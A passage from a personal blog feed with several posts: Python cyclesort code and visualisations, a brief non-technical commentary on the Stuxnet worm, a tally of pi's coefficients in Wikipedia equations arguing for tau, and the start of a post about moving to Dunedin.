</span><span style="color:#b48ead;">for </span><span style="color:#c0c5ce;">i </span><span style="color:#b48ead;">in </span><span style="color:#96b5b4;">range</span><span style="color:#c0c5ce;">(</span><span style="color:#96b5b4;">len</span><span style="color:#c0c5ce;">(l)):
</span><span style="color:#b48ead;">if </span><span style="color:#c0c5ce;">i != </span><span style="color:#bf616a;">key</span><span style="color:#c0c5ce;">(l[i]):
n = i
</span><span style="color:#b48ead;">while </span><span style="color:#d08770;">1</span><span style="color:#c0c5ce;">:
tmp = l[n]
</span><span style="color:#b48ead;">if </span><span style="color:#c0c5ce;">n != i:
l[n] = last_value
last_value = tmp
n = </span><span style="color:#bf616a;">key</span><span style="color:#c0c5ce;">(last_value)
</span><span style="color:#b48ead;">if </span><span style="color:#c0c5ce;">n == i:
l[n] = last_value
</span><span style="color:#b48ead;">break
</span></code></pre>
<p>The <strong>cyclesort_simple</strong> algorithm only works on permutations of sets of
numbers ranging from <strong>0</strong> to <strong>n</strong>. There are other fast ways to sort data of
this restricted kind, but all the methods I know of require additional memory
proportional to <strong>n</strong>. Cyclesort can do it without any extra storage at all,
which is a neat trick.</p>
<h2 id="visualising-cyclesort">Visualising cyclesort</h2>
<p>At this point, we have enough information to visualise the algorithm, so let's
take a look at the beastie we're working with. I've had to make some little
adjustments to the usual sortvis.org visualisation process to cope with
cyclesort. In the algorithm above, the first element is duplicated into the
second position of each cycle, and that duplicate remains in play until it's
over-written by the last element of the cycle. I changed the algorithm slightly
to write a null placeholder at the start of the cycle to avoid duplicates, and
taught the sortvis.org visualiser to deal with "empty" slots. The resulting
<a href="http://sortvis.org/visualisations.html">weave</a> visualisation looks like this:</p>
<div class="media">
<a href="cyclesort.png">
<img src="cyclesort.png" />
</a>
</div>
<p>This is quite satisfying - you can tell where each cycle begins and ends by the
gaps, which span each cycle exactly. It's immediately clear that the
permutation above, for instance, contained five cycles. Within each cycle, you
can follow along as each element replaces the next, until we finally close the
gap by placing the last element in the first slot.</p>
<p>The <a href="http://sortvis.org/visualisations.html">dense</a> visualisation is less
informative because the gaps are too small to see at a single-pixel width, and
the algorithm doesn't have much other large-scale structure. It still looks
neat, though:</p>
<div class="media">
<a href="cyclesort-dense.png">
<img src="cyclesort-dense.png" />
</a>
</div>
<h2 id="generalising-cyclesort">Generalising cyclesort</h2>
<p>Cyclesort works whenever we can write an implementation of the <strong>key</strong>
function, so there's quite a bit of scope for clever exploitation of structured
data. The Haddon paper presents a solution for one common case: permutations
whose elements come from a relatively small set, where the number of occurances
of each element is known. The insight is that the <strong>key</strong> function can have
persistent state, letting us calculate the positions of elements incrementally
as we work through the list.</p>
<p>We begin by adding an extra argument to our sort function: a list <strong>(element,
count)</strong> tuples telling us a) the order of the keys, and b) the frequency with
which each key occurs.</p>
<pre style="background-color:#2b303b;">
<code><span style="color:#c0c5ce;">[("</span><span style="color:#a3be8c;">a</span><span style="color:#c0c5ce;">", </span><span style="color:#d08770;">10</span><span style="color:#c0c5ce;">), ("</span><span style="color:#a3be8c;">b</span><span style="color:#c0c5ce;">", </span><span style="color:#d08770;">33</span><span style="color:#c0c5ce;">), ("</span><span style="color:#a3be8c;">c</span><span style="color:#c0c5ce;">", </span><span style="color:#d08770;">18</span><span style="color:#c0c5ce;">), ("</span><span style="color:#a3be8c;">d</span><span style="color:#c0c5ce;">", </span><span style="color:#d08770;">41</span><span style="color:#c0c5ce;">)]
</span></code></pre>
<p>Now, in the sorted list, we know that there will be a contiguous blog of 10
"a"s, followed by a contiguous block of 33 "b"s, and so forth. We can use this
information to calculate the offset of each contiguous block up front:</p>
<pre style="background-color:#2b303b;">
<code><span style="color:#b48ead;">def </span><span style="color:#8fa1b3;">offsets</span><span style="color:#c0c5ce;">(</span><span style="color:#bf616a;">keys</span><span style="color:#c0c5ce;">):
d = {}
offset = </span><span style="color:#d08770;">0
</span><span style="color:#b48ead;">for </span><span style="color:#c0c5ce;">key, occurences </span><span style="color:#b48ead;">in </span><span style="color:#c0c5ce;">keys:
d[key] = offset
offset += occurences
</span><span style="color:#b48ead;">return </span><span style="color:#c0c5ce;">d
</span></code></pre>
<p>The <strong>key</strong> function uses this offset dictionary to look up the current index
for any element. Each time we insert an element into position, we increment the
relevant offset entry - next time we get to an element of the same type, we
will place it in the next position in the contiguous block. We also make a
small modification to the algorithm to cater for the progressive position
increment process: we start a cycle only when the element is equal to or above
the position where it ought to be. Here's a Python implementation:</p>
<pre style="background-color:#2b303b;">
<code><span style="color:#b48ead;">def </span><span style="color:#8fa1b3;">offsets</span><span style="color:#c0c5ce;">(</span><span style="color:#bf616a;">keys</span><span style="color:#c0c5ce;">):
d = {}
offset = </span><span style="color:#d08770;">0
</span><span style="color:#b48ead;">for </span><span style="color:#c0c5ce;">key, occurences </span><span style="color:#b48ead;">in </span><span style="color:#c0c5ce;">keys:
d[key] = offset
offset += occurences
</span><span style="color:#b48ead;">return </span><span style="color:#c0c5ce;">d
</span><span style="color:#b48ead;">def </span><span style="color:#8fa1b3;">key</span><span style="color:#c0c5ce;">(</span><span style="color:#bf616a;">o</span><span style="color:#c0c5ce;">, </span><span style="color:#bf616a;">element</span><span style="color:#c0c5ce;">):
</span><span style="color:#b48ead;">return </span><span style="color:#c0c5ce;">o[element]
</span><span style="color:#b48ead;">def </span><span style="color:#8fa1b3;">cyclesort_general</span><span style="color:#c0c5ce;">(</span><span style="color:#bf616a;">l</span><span style="color:#c0c5ce;">, </span><span style="color:#bf616a;">keys</span><span style="color:#c0c5ce;">):
o = </span><span style="color:#bf616a;">offsets</span><span style="color:#c0c5ce;">(keys)
</span><span style="color:#b48ead;">for </span><span style="color:#c0c5ce;">i </span><span style="color:#b48ead;">in </span><span style="color:#96b5b4;">range</span><span style="color:#c0c5ce;">(</span><span style="color:#96b5b4;">len</span><span style="color:#c0c5ce;">(l)):
</span><span style="color:#b48ead;">if </span><span style="color:#c0c5ce;">i >= </span><span style="color:#bf616a;">key</span><span style="color:#c0c5ce;">(o, l[i]):
n = i
</span><span style="color:#b48ead;">while </span><span style="color:#d08770;">1</span><span style="color:#c0c5ce;">:
tmp = l[n]
</span><span style="color:#b48ead;">if </span><span style="color:#c0c5ce;">n != i:
l[n] = last_value
last_value = tmp
n = </span><span style="color:#bf616a;">key</span><span style="color:#c0c5ce;">(o, last_value)
o[last_value] += </span><span style="color:#d08770;">1
</span><span style="color:#b48ead;">if </span><span style="color:#c0c5ce;">n == i:
l[n] = last_value
</span><span style="color:#b48ead;">break
</span></code></pre>
<p>This algorithm runs in <strong>O(n + m)</strong>, where <strong>n</strong> is the number of elements and
<strong>m</strong> is the number of distinct element values. In practice <strong>m</strong> is usually
small, so this is often tantamount to being <strong>O(n)</strong>.</p>
<h2 id="the-code">The code</h2>
<p>As usual, the code for these visualisations have been incorporated into the
<a href="https://github.com/cortesi/sortvis">sortvis project</a>. I've also added the
visualisations above to the <a href="http://sortvis.org">sortvis.org</a> website.</p>
What Stuxnet means
2010-11-15T00:00:00+00:00
2010-11-15T00:00:00+00:00
https://corte.si/posts/security/stuxnet/
<p><a href="http://www.symantec.com/connect/blogs/stuxnet-breakthrough">The last bit of evidence is now
in</a> - it appears
that the mysterious <a href="http://en.wikipedia.org/wiki/Stuxnet">Stuxnet</a> worm was
indeed aimed at Iran's nuclear capability. This means that we now know for sure
that Stuxnet was an event of great significance - the first example of a type of
sophisticated interstate warfare that we can expect to see a lot more of in
future. It neatly ties together a number of trends that we've been talking about
to clients at <a href="http://www.nullcube.com">Nullcube</a> for years:</p>
<ul>
<li><strong>The worm as a targeted delivery platform.</strong> Stuxnet spread indiscriminately,
waiting until it infected its intended target before springing into action.
This is a marvelous delivery platform with excellent deniability. When
executed with flair - using multiple previously unknown vulnerabilities,
spreading through both physical media and networks - it can be incredibly hard
to defend against. Look for a Stuxnet-like worm that exfiltrates data from
targeted systems next.</li>
<li><strong>Internet security is a national concern.</strong> There's a tendency to view the
Internet as an internationally homogeneous network. Stuxnet makes it (even
more) clear that the Internet is a domain for contest between nation states,
and that national differences in security readiness and technology populations
matter. Look for more direct government involvement in tracking and improving
the security of local networks. I suspect we'll also see the rise of national
perimeter defenses in some countries in the next few years.</li>
<li><strong>Embedded systems are a target.</strong> Embedded systems are everywhere, are often
ignored when security is considered, and are opaque, difficult to inspect, and
difficult to monitor. This is a malware nirvana. Whether they are directly or
indirectly connected to a network, embedded systems are a target. My
prediction: soon, we'll see a Stuxnet-like worm that spreads directly from
embedded system to embedded system, most likely affecting DSL modems. In fact,
we've already seen a clumsy precursor of this in <a href="http://en.wikipedia.org/wiki/Psyb0t">Psyb0t</a>, discovered at the beginning of 2009.</li>
</ul>
<p>There's a lot about this incident that we will most likely never know. We're
unlikely to find out who's behind Stuxnet (although Israel and the US seem to
be the only real possibilities). We're unlikely to find out if Stuxnet ever
repayed the immense technological capital its creators invested. But we do know
that it's a sign of things to come.</p>
Tau: is it worth switching?
2010-10-04T00:00:00+00:00
2010-10-04T00:00:00+00:00
https://corte.si/posts/maths/tau/
<p>The mailing list for my <a href="http://dunedin.linux.net.nz/Main/HomePage">local LUG</a>
recently had a small flurry of posts on <a href="http://www.tauday.com/">The Tau
Manifesto</a>, a proposal to replace of the constant π with
τ, equal to 2π. Pro- and anti- camps quickly emerged, and much beer will likely
be spilt over the issue at our next meeting.</p>
<p>Disregarding for the moment any conceptual elegance or expanatory power that
Tau might have, I was interested to know if the move would really reduce
redundancy in common mathematical expressions. Lets say (rather arbitrarily)
that Tau simplifies a mathematical expression whenever π is preceded by an even
constant - that means that 2π becomes τ, and 4π becomes 2τ, and so forth. I had
a vague intuition that the majority of occurances of π in the wild fell into
this category, which might indicate that τ is a more natural (or at least
parsimonious) constant to use. Was my hunch right? This, I felt, was something
I could quantify.</p>
<h2 id="methodology">Methodology</h2>
<p>I wrote a small script to crawl all the articles linked to from the Wikipedia
<a href="http://en.wikipedia.org/wiki/List_of_equations">List of Equations</a> page. For
each page, I extracted all mathematical expressions, and checked the LaTeX
source of each for occurances of the symbol π. A little bit of light parsing
was then done to check if the symbol was directly preceded by an integer
constant. Finally, I rendered the LaTeX source back to images to produce the
equation tables below.</p>
<p>Of course, anyone of sound judgement will disregard what follows entirely, due
to the many obvious shortcomings of this procedure and its underlying
assumptions. Readers of my blog, on the other hand, may find the results
interesting.</p>
<h2 id="results">Results</h2>
<p>I found a total of 3173 equations, of which 133 contained the symbol π. Of these
133 equations, the distribution of constant factors preceding π looked like
this:</p>
<div class="media">
<a href="taugraph.png">
<img src="taugraph.png" />
</a>
</div>
<p>I call this a straight win for Tau - the vast majority of expressions using π
(119 of 133) are preceded by even integer constants.</p>
<h2 id="equations">Equations</h2>
<p>Below are all the expressions that included π, plus the detected constant
factor. The headings point to the Wikipedia pages from which the equations were
taken.</p>
<p>If nothing else, this list is a nice reminder of the mysterious ubiquity of a
constant involving the diameter and circumference of a circle in all aspects of
physics and higher math.</p>
<h2><a href="http://en.wikipedia.org/wiki/Relativistic_wave_equations">Relativistic wave equations</a></h2>
<table>
<th>constant</th> <th>expression</th>
<tr>
<td style="text-align: center;" class="factor_even">8</td>
<td>
<img src="1.png"/>
</td>
</tr>
</table>
<h2><a href="http://en.wikipedia.org/wiki/Sine-Gordon_equation">Sine-Gordon equation</a></h2>
<table>
<th>constant</th> <th>expression</th>
<tr>
<td style="text-align: center;" class="factor_even">2</td>
<td>
<img src="2.png"/>
</td>
</tr>
<tr>
<td style="text-align: center;" class="factor_even">2</td>
<td>
<img src="3.png"/>
</td>
</tr>
</table>
<h2><a href="http://en.wikipedia.org/wiki/Fokker%E2%80%93Planck_equation">Fokker–Planck equation</a></h2>
<table>
<th>constant</th> <th>expression</th>
<tr>
<td style="text-align: center;" class="factor_even">2</td>
<td>
<img src="4.png"/>
</td>
</tr>
<tr>
<td style="text-align: center;" class="factor_even">2</td>
<td>
<img src="5.png"/>
</td>
</tr>
<tr>
<td style="text-align: center;" class="factor_even">2</td>
<td>
<img src="6.png"/>
</td>
</tr>
<tr>
<td style="text-align: center;" class="factor_even">2</td>
<td>
<img src="7.png"/>
</td>
</tr>
</table>
<h2><a href="http://en.wikipedia.org/wiki/Euler%27s_equation">Euler's equation</a></h2>
<table>
<th>constant</th> <th>expression</th>
<tr>
<td style="text-align: center;" class="factor_none">None</td>
<td>
<img src="8.png"/>
</td>
</tr>
</table>
<h2><a href="http://en.wikipedia.org/wiki/Friedmann_equations">Friedmann equations</a></h2>
<table>
<th>constant</th> <th>expression</th>
<tr>
<td style="text-align: center;" class="factor_even">8</td>
<td>
<img src="9.png"/>
</td>
</tr>
<tr>
<td style="text-align: center;" class="factor_even">4</td>
<td>
<img src="10.png"/>
</td>
</tr>
<tr>
<td style="text-align: center;" class="factor_even">8</td>
<td>
<img src="11.png"/>
</td>
</tr>
<tr>
<td style="text-align: center;" class="factor_even">8</td>
<td>
<img src="12.png"/>
</td>
</tr>
<tr>
<td style="text-align: center;" class="factor_even">8</td>
<td>
<img src="13.png"/>
</td>
</tr>
<tr>
<td style="text-align: center;" class="factor_even">4</td>
<td>
<img src="14.png"/>
</td>
</tr>
<tr>
<td style="text-align: center;" class="factor_even">8</td>
<td>
<img src="15.png"/>
</td>
</tr>
<tr>
<td style="text-align: center;" class="factor_even">8</td>
<td>
<img src="16.png"/>
</td>
</tr>
<tr>
<td style="text-align: center;" class="factor_even">8</td>
<td>
<img src="17.png"/>
</td>
</tr>
<tr>
<td style="text-align: center;" class="factor_even">8</td>
<td>
<img src="18.png"/>
</td>
</tr>
</table>
<h2><a href="http://en.wikipedia.org/wiki/Vlasov_equation">Vlasov equation</a></h2>
<table>
<th>constant</th> <th>expression</th>
<tr>
<td style="text-align: center;" class="factor_even">4</td>
<td>
<img src="19.png"/>
</td>
</tr>
<tr>
<td style="text-align: center;" class="factor_even">4</td>
<td>
<img src="20.png"/>
</td>
</tr>
<tr>
<td style="text-align: center;" class="factor_even">4</td>
<td>
<img src="21.png"/>
</td>
</tr>
</table>
<h2><a href="http://en.wikipedia.org/wiki/Screened_Poisson_equation">Screened Poisson equation</a></h2>
<table>
<th>constant</th> <th>expression</th>
<tr>
<td style="text-align: center;" class="factor_even">4</td>
<td>
<img src="22.png"/>
</td>
</tr>
<tr>
<td style="text-align: center;" class="factor_even">2</td>
<td>
<img src="23.png"/>
</td>
</tr>
<tr>
<td style="text-align: center;" class="factor_even">2</td>
<td>
<img src="24.png"/>
</td>
</tr>
<tr>
<td style="text-align: center;" class="factor_even">4</td>
<td>
<img src="25.png"/>
</td>
</tr>
<tr>
<td style="text-align: center;" class="factor_even">4</td>
<td>
<img src="26.png"/>
</td>
</tr>
</table>
<h2><a href="http://en.wikipedia.org/wiki/Quadratic_equation">Quadratic equation</a></h2>
<table>
<th>constant</th> <th>expression</th>
<tr>
<td style="text-align: center;" class="factor_even">4</td>
<td>
<img src="27.png"/>
</td>
</tr>
<tr>
<td style="text-align: center;" class="factor_even">2</td>
<td>
<img src="28.png"/>
</td>
</tr>
</table>
<h2><a href="http://en.wikipedia.org/wiki/Stokes-Einstein_relation">Stokes-Einstein relation</a></h2>
<table>
<th>constant</th> <th>expression</th>
<tr>
<td style="text-align: center;" class="factor_even">6</td>
<td>
<img src="29.png"/>
</td>
</tr>
<tr>
<td style="text-align: center;" class="factor_even">6</td>
<td>
<img src="30.png"/>
</td>
</tr>
<tr>
<td style="text-align: center;" class="factor_even">6</td>
<td>
<img src="31.png"/>
</td>
</tr>
</table>
<h2><a href="http://en.wikipedia.org/wiki/Fisher_equation">Fisher equation</a></h2>
<table>
<th>constant</th> <th>expression</th>
<tr>
<td style="text-align: center;" class="factor_none">None</td>
<td>
<img src="32.png"/>
</td>
</tr>
<tr>
<td style="text-align: center;" class="factor_none">None</td>
<td>
<img src="33.png"/>
</td>
</tr>
<tr>
<td style="text-align: center;" class="factor_odd">None</td>
<td>
<img src="34.png"/>
</td>
</tr>
<tr>
<td style="text-align: center;" class="factor_none">None</td>
<td>
<img src="35.png"/>
</td>
</tr>
</table>
<h2><a href="http://en.wikipedia.org/wiki/Einstein%27s_field_equation">Einstein's field equation</a></h2>
<table>
<th>constant</th> <th>expression</th>
<tr>
<td style="text-align: center;" class="factor_even">8</td>
<td>
<img src="36.png"/>
</td>
</tr>
<tr>
<td style="text-align: center;" class="factor_even">8</td>
<td>
<img src="37.png"/>
</td>
</tr>
<tr>
<td style="text-align: center;" class="factor_even">8</td>
<td>
<img src="38.png"/>
</td>
</tr>
<tr>
<td style="text-align: center;" class="factor_even">8</td>
<td>
<img src="39.png"/>
</td>
</tr>
<tr>
<td style="text-align: center;" class="factor_even">8</td>
<td>
<img src="40.png"/>
</td>
</tr>
<tr>
<td style="text-align: center;" class="factor_even">8</td>
<td>
<img src="41.png"/>
</td>
</tr>
<tr>
<td style="text-align: center;" class="factor_even">8</td>
<td>
<img src="42.png"/>
</td>
</tr>
<tr>
<td style="text-align: center;" class="factor_even">8</td>
<td>
<img src="43.png"/>
</td>
</tr>
<tr>
<td style="text-align: center;" class="factor_even">8</td>
<td>
<img src="44.png"/>
</td>
</tr>
<tr>
<td style="text-align: center;" class="factor_even">8</td>
<td>
<img src="45.png"/>
</td>
</tr>
<tr>
<td style="text-align: center;" class="factor_even">8</td>
<td>
<img src="46.png"/>
</td>
</tr>
<tr>
<td style="text-align: center;" class="factor_even">8</td>
<td>
<img src="47.png"/>
</td>
</tr>
<tr>
<td style="text-align: center;" class="factor_even">4</td>
<td>
<img src="48.png"/>
</td>
</tr>
<tr>
<td style="text-align: center;" class="factor_even">4</td>
<td>
<img src="49.png"/>
</td>
</tr>
<tr>
<td style="text-align: center;" class="factor_even">4</td>
<td>
<img src="50.png"/>
</td>
</tr>
<tr>
<td style="text-align: center;" class="factor_even">8</td>
<td>
<img src="51.png"/>
</td>
</tr>
<tr>
<td style="text-align: center;" class="factor_even">8</td>
<td>
<img src="52.png"/>
</td>
</tr>
</table>
<h2><a href="http://en.wikipedia.org/wiki/Sackur-Tetrode_equation">Sackur-Tetrode equation</a></h2>
<table>
<th>constant</th> <th>expression</th>
<tr>
<td style="text-align: center;" class="factor_even">4</td>
<td>
<img src="53.png"/>
</td>
</tr>
</table>
<h2><a href="http://en.wikipedia.org/wiki/Laplace%27s_equation">Laplace's equation</a></h2>
<table>
<th>constant</th> <th>expression</th>
<tr>
<td style="text-align: center;" class="factor_none">None</td>
<td>
<img src="54.png"/>
</td>
</tr>
<tr>
<td style="text-align: center;" class="factor_even">4</td>
<td>
<img src="55.png"/>
</td>
</tr>
<tr>
<td style="text-align: center;" class="factor_even">4</td>
<td>
<img src="56.png"/>
</td>
</tr>
<tr>
<td style="text-align: center;" class="factor_even">4</td>
<td>
<img src="57.png"/>
</td>
</tr>
<tr>
<td style="text-align: center;" class="factor_even">2</td>
<td>
<img src="58.png"/>
</td>
</tr>
<tr>
<td style="text-align: center;" class="factor_even">4</td>
<td>
<img src="59.png"/>
</td>
</tr>
<tr>
<td style="text-align: center;" class="factor_even">4</td>
<td>
<img src="60.png"/>
</td>
</tr>
</table>
<h2><a href="http://en.wikipedia.org/wiki/Cauchy-Riemann_equations">Cauchy-Riemann equations</a></h2>
<table>
<th>constant</th> <th>expression</th>
<tr>
<td style="text-align: center;" class="factor_even">2</td>
<td>
<img src="61.png"/>
</td>
</tr>
</table>
<h2><a href="http://en.wikipedia.org/wiki/Cubic_equation">Cubic equation</a></h2>
<table>
<th>constant</th> <th>expression</th>
<tr>
<td style="text-align: center;" class="factor_even">2</td>
<td>
<img src="62.png"/>
</td>
</tr>
<tr>
<td style="text-align: center;" class="factor_even">2</td>
<td>
<img src="63.png"/>
</td>
</tr>
<tr>
<td style="text-align: center;" class="factor_even">2</td>
<td>
<img src="64.png"/>
</td>
</tr>
<tr>
<td style="text-align: center;" class="factor_even">4</td>
<td>
<img src="65.png"/>
</td>
</tr>
<tr>
<td style="text-align: center;" class="factor_even">2</td>
<td>
<img src="66.png"/>
</td>
</tr>
</table>
<h2><a href="http://en.wikipedia.org/wiki/Partial_differential_equation">Partial differential equation</a></h2>
<table>
<th>constant</th> <th>expression</th>
<tr>
<td style="text-align: center;" class="factor_even">2</td>
<td>
<img src="67.png"/>
</td>
</tr>
<tr>
<td style="text-align: center;" class="factor_even">2</td>
<td>
<img src="68.png"/>
</td>
</tr>
<tr>
<td style="text-align: center;" class="factor_even">2</td>
<td>
<img src="69.png"/>
</td>
</tr>
<tr>
<td style="text-align: center;" class="factor_even">2</td>
<td>
<img src="70.png"/>
</td>
</tr>
<tr>
<td style="text-align: center;" class="factor_none">None</td>
<td>
<img src="71.png"/>
</td>
</tr>
<tr>
<td style="text-align: center;" class="factor_even">2</td>
<td>
<img src="72.png"/>
</td>
</tr>
<tr>
<td style="text-align: center;" class="factor_none">None</td>
<td>
<img src="73.png"/>
</td>
</tr>
</table>
<h2><a href="http://en.wikipedia.org/wiki/Lane-Emden_equation">Lane-Emden equation</a></h2>
<table>
<th>constant</th> <th>expression</th>
<tr>
<td style="text-align: center;" class="factor_even">4</td>
<td>
<img src="74.png"/>
</td>
</tr>
</table>
<h2><a href="http://en.wikipedia.org/wiki/Heat_equation">Heat equation</a></h2>
<table>
<th>constant</th> <th>expression</th>
<tr>
<td style="text-align: center;" class="factor_none">None</td>
<td>
<img src="75.png"/>
</td>
</tr>
<tr>
<td style="text-align: center;" class="factor_none">None</td>
<td>
<img src="76.png"/>
</td>
</tr>
<tr>
<td style="text-align: center;" class="factor_none">None</td>
<td>
<img src="77.png"/>
</td>
</tr>
<tr>
<td style="text-align: center;" class="factor_none">None</td>
<td>
<img src="78.png"/>
</td>
</tr>
<tr>
<td style="text-align: center;" class="factor_even">2</td>
<td>
<img src="79.png"/>
</td>
</tr>
<tr>
<td style="text-align: center;" class="factor_even">4</td>
<td>
<img src="80.png"/>
</td>
</tr>
<tr>
<td style="text-align: center;" class="factor_even">4</td>
<td>
<img src="81.png"/>
</td>
</tr>
<tr>
<td style="text-align: center;" class="factor_even">4</td>
<td>
<img src="82.png"/>
</td>
</tr>
<tr>
<td style="text-align: center;" class="factor_even">4</td>
<td>
<img src="83.png"/>
</td>
</tr>
<tr>
<td style="text-align: center;" class="factor_even">4</td>
<td>
<img src="84.png"/>
</td>
</tr>
<tr>
<td style="text-align: center;" class="factor_even">4</td>
<td>
<img src="85.png"/>
</td>
</tr>
<tr>
<td style="text-align: center;" class="factor_even">4</td>
<td>
<img src="86.png"/>
</td>
</tr>
<tr>
<td style="text-align: center;" class="factor_even">4</td>
<td>
<img src="87.png"/>
</td>
</tr>
<tr>
<td style="text-align: center;" class="factor_even">4</td>
<td>
<img src="88.png"/>
</td>
</tr>
<tr>
<td style="text-align: center;" class="factor_even">4</td>
<td>
<img src="89.png"/>
</td>
</tr>
<tr>
<td style="text-align: center;" class="factor_even">2</td>
<td>
<img src="90.png"/>
</td>
</tr>
<tr>
<td style="text-align: center;" class="factor_even">2</td>
<td>
<img src="91.png"/>
</td>
</tr>
</table>
<h2><a href="http://en.wikipedia.org/wiki/Wave_equation">Wave equation</a></h2>
<table>
<th>constant</th> <th>expression</th>
<tr>
<td style="text-align: center;" class="factor_even">4</td>
<td>
<img src="92.png"/>
</td>
</tr>
<tr>
<td style="text-align: center;" class="factor_even">4</td>
<td>
<img src="93.png"/>
</td>
</tr>
<tr>
<td style="text-align: center;" class="factor_even">4</td>
<td>
<img src="94.png"/>
</td>
</tr>
<tr>
<td style="text-align: center;" class="factor_even">2</td>
<td>
<img src="95.png"/>
</td>
</tr>
</table>
<h2><a href="http://en.wikipedia.org/wiki/Primitive_equations">Primitive equations</a></h2>
<table>
<th>constant</th> <th>expression</th>
<tr>
<td style="text-align: center;" class="factor_none">None</td>
<td>
<img src="96.png"/>
</td>
</tr>
<tr>
<td style="text-align: center;" class="factor_none">None</td>
<td>
<img src="97.png"/>
</td>
</tr>
</table>
<h2><a href="http://en.wikipedia.org/wiki/Quintic_equation">Quintic equation</a></h2>
<table>
<th>constant</th> <th>expression</th>
<tr>
<td style="text-align: center;" class="factor_even">2</td>
<td>
<img src="98.png"/>
</td>
</tr>
<tr>
<td style="text-align: center;" class="factor_even">2</td>
<td>
<img src="99.png"/>
</td>
</tr>
<tr>
<td style="text-align: center;" class="factor_even">2</td>
<td>
<img src="100.png"/>
</td>
</tr>
<tr>
<td style="text-align: center;" class="factor_even">2</td>
<td>
<img src="101.png"/>
</td>
</tr>
<tr>
<td style="text-align: center;" class="factor_even">2</td>
<td>
<img src="102.png"/>
</td>
</tr>
</table>
<h2><a href="http://en.wikipedia.org/wiki/Black%E2%80%93Scholes_equation">Black–Scholes equation</a></h2>
<table>
<th>constant</th> <th>expression</th>
<tr>
<td style="text-align: center;" class="factor_even">2</td>
<td>
<img src="103.png"/>
</td>
</tr>
<tr>
<td style="text-align: center;" class="factor_even">2</td>
<td>
<img src="104.png"/>
</td>
</tr>
<tr>
<td style="text-align: center;" class="factor_even">2</td>
<td>
<img src="105.png"/>
</td>
</tr>
</table>
<h2><a href="http://en.wikipedia.org/wiki/Fredholm_integral_equation">Fredholm integral equation</a></h2>
<table>
<th>constant</th> <th>expression</th>
<tr>
<td style="text-align: center;" class="factor_even">2</td>
<td>
<img src="106.png"/>
</td>
</tr>
</table>
<h2><a href="http://en.wikipedia.org/wiki/Poisson%27s_equation">Poisson's equation</a></h2>
<table>
<th>constant</th> <th>expression</th>
<tr>
<td style="text-align: center;" class="factor_even">2</td>
<td>
<img src="107.png"/>
</td>
</tr>
<tr>
<td style="text-align: center;" class="factor_even">4</td>
<td>
<img src="108.png"/>
</td>
</tr>
<tr>
<td style="text-align: center;" class="factor_even">4</td>
<td>
<img src="109.png"/>
</td>
</tr>
</table>
<h2><a href="http://en.wikipedia.org/wiki/Helmholtz_Equation">Helmholtz Equation</a></h2>
<table>
<th>constant</th> <th>expression</th>
<tr>
<td style="text-align: center;" class="factor_even">4</td>
<td>
<img src="110.png"/>
</td>
</tr>
</table>
<h2><a href="http://en.wikipedia.org/wiki/Van_der_Waals_equation">Van der Waals equation</a></h2>
<table>
<th>constant</th> <th>expression</th>
<tr>
<td style="text-align: center;" class="factor_even">4</td>
<td>
<img src="111.png"/>
</td>
</tr>
<tr>
<td style="text-align: center;" class="factor_even">4</td>
<td>
<img src="112.png"/>
</td>
</tr>
<tr>
<td style="text-align: center;" class="factor_even">2</td>
<td>
<img src="113.png"/>
</td>
</tr>
<tr>
<td style="text-align: center;" class="factor_even">4</td>
<td>
<img src="114.png"/>
</td>
</tr>
<tr>
<td style="text-align: center;" class="factor_even">2</td>
<td>
<img src="115.png"/>
</td>
</tr>
</table>
<h2><a href="http://en.wikipedia.org/wiki/Lorentz_equation">Lorentz equation</a></h2>
<table>
<th>constant</th> <th>expression</th>
<tr>
<td style="text-align: center;" class="factor_even">4</td>
<td>
<img src="116.png"/>
</td>
</tr>
<tr>
<td style="text-align: center;" class="factor_even">4</td>
<td>
<img src="117.png"/>
</td>
</tr>
<tr>
<td style="text-align: center;" class="factor_even">4</td>
<td>
<img src="118.png"/>
</td>
</tr>
</table>
<h2><a href="http://en.wikipedia.org/wiki/Maxwell%27s_equations">Maxwell's equations</a></h2>
<table>
<th>constant</th> <th>expression</th>
<tr>
<td style="text-align: center;" class="factor_even">4</td>
<td>
<img src="119.png"/>
</td>
</tr>
<tr>
<td style="text-align: center;" class="factor_even">4</td>
<td>
<img src="120.png"/>
</td>
</tr>
<tr>
<td style="text-align: center;" class="factor_even">4</td>
<td>
<img src="121.png"/>
</td>
</tr>
<tr>
<td style="text-align: center;" class="factor_even">4</td>
<td>
<img src="122.png"/>
</td>
</tr>
<tr>
<td style="text-align: center;" class="factor_even">4</td>
<td>
<img src="123.png"/>
</td>
</tr>
<tr>
<td style="text-align: center;" class="factor_even">4</td>
<td>
<img src="124.png"/>
</td>
</tr>
<tr>
<td style="text-align: center;" class="factor_even">4</td>
<td>
<img src="125.png"/>
</td>
</tr>
<tr>
<td style="text-align: center;" class="factor_even">4</td>
<td>
<img src="126.png"/>
</td>
</tr>
<tr>
<td style="text-align: center;" class="factor_even">4</td>
<td>
<img src="127.png"/>
</td>
</tr>
<tr>
<td style="text-align: center;" class="factor_even">4</td>
<td>
<img src="128.png"/>
</td>
</tr>
<tr>
<td style="text-align: center;" class="factor_even">4</td>
<td>
<img src="129.png"/>
</td>
</tr>
<tr>
<td style="text-align: center;" class="factor_even">4</td>
<td>
<img src="130.png"/>
</td>
</tr>
<tr>
<td style="text-align: center;" class="factor_even">4</td>
<td>
<img src="131.png"/>
</td>
</tr>
<tr>
<td style="text-align: center;" class="factor_even">4</td>
<td>
<img src="132.png"/>
</td>
</tr>
<tr>
<td style="text-align: center;" class="factor_even">4</td>
<td>
<img src="133.png"/>
</td>
</tr>
</table>
Sea lions and lifestyle change
2010-09-02T00:00:00+00:00
2010-09-02T00:00:00+00:00
https://corte.si/posts/photos/sealions-and-lifestyle/
<p>About a year and a half ago, after dinner at a favourite local restaurant, and
having entered into that zone of philosophical clarity that sets in around the
dessert wine, my wife and I had the sudden simultaneous realisation that it was
time for a change. For most of our adult lives, we had lived in the suburb of
Newtown in Sydney - a hyper-urban jungle densely packed with coffee shops and
theatres, inhabited by a thronging mixture of students and bohemians with
counterculturally-correct hairdos. It was all beginning to seem a bit tired and
same-ish. We needed more time and more space. We needed to get back to the
essentials of life.</p>
<p>Four weeks later our furniture was in a shipping container en-route to Dunedin,
a small university town near the southern tip of New Zealand. We decided to
work together from home, keeping our schedules flexible to make time for walks,
reading, cooking, and (more recently) spending time with our son. It was a huge
risk - it was quite possible that the isolation would impose a punishing work
travel regime on me, or put a crimp in my wife's very specialised career in
linguistics. It took enterprise, determination and a no small amount of
possibly-foolish optimism, but it's all worked out. Our leap of faith has
turned out to be one of the best decisions we've ever made. Dunedin is a
